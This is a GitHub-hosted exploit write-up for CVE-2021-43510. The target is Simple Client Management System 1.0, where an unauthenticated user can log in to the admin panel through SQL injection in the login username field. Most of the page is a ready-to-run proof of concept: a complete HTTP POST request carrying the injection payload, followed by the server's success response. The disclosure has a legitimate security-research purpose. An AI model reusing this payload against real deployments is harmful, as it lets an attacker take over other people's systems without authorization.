Headline
CVE-2021-43510: Simple-Client-Management-System-Exploit/CVE-2021-43510 at main · r4hn1/Simple-Client-Management-System-Exploit
SQL Injection vulnerability exists in Sourcecodester Simple Client Management System 1.0 via the username field in login.php.
Permalink
Cannot retrieve contributors at this time
# Exploit Title: Simple Client Management System 1.0 - SQL injection (Authentication Bypass)
# Date: 27/01/2022
# Exploit Author: Rahul Kalnarayan (r4hn1)
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html
# Version: 1.0
# Category: Webapps
# Tested on: Apache2+MariaDB latest version
# Description : Simple Client Management System 1.0 suffers from SQL injection vulnerability, allowing an un-authenticated user to login admin panel.
# CVE ID: CVE-2021-43510
Vulnerable Page: /crm/admin/
POC-Request
-----------------------------------
POST /cms/classes/Login.php?f=login HTTP/1.1
Host: 192.168.1.76
Content-Length: 31
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.76
Referer: http://192.168.1.76/cms/admin/login.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
username=admin’+or+’1’%3d’1’–±&password=as
---------------------------------------
POC-Response
HTTP/1.1 200 OK
Date: Thu, 27 Jan 2022 17:29:08 GMT
Server: Apache/2.4.38 (Debian)
Set-Cookie: PHPSESSID=1s27q3saavhi3jc8lndng66tlt; path=/; secure
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8
{"status":"success"}